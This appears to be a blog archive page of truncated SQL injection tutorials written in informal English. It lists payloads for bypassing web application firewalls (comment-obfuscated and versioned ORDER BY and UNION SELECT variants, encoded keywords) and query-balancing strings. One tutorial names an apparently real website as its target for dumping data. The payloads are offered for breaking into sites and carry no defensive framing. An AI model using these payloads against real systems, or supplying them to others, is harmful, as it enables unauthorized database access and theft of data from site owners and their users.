Newest Post
Archive for Februari 2017

Now ill show different waf's we face while we inject sites in some examples ::
example (1)
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt -- - [no waf]
so...

[~] order by [~]
----------------
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]
--------------------
/*!50000%55nIoN*/...

hello frnds,
today
we will discuss about how to bypass hard waf filters with local
varaible when regular formats for dumping data are not working then this
is a best alternative to try...

Hello
Today i'm going to show you sqli (variable) method.***
ok let's start :
1. 1st we will try to balance query
site: http://www.unmpress.com/shell.php?Page=catalog
so we will put ( \ ) back slash...
--'- : +--+ / : -- - : --+- : /*
) order by 1-- -
') order by 1-- -
')order by 1%23%23
%')order by 1%23%23
Null' order by 100--+
Null' order by 9999--+
')group by 99-- -
'group by 119449-- -
'group/**/by/**/99%23%23
union...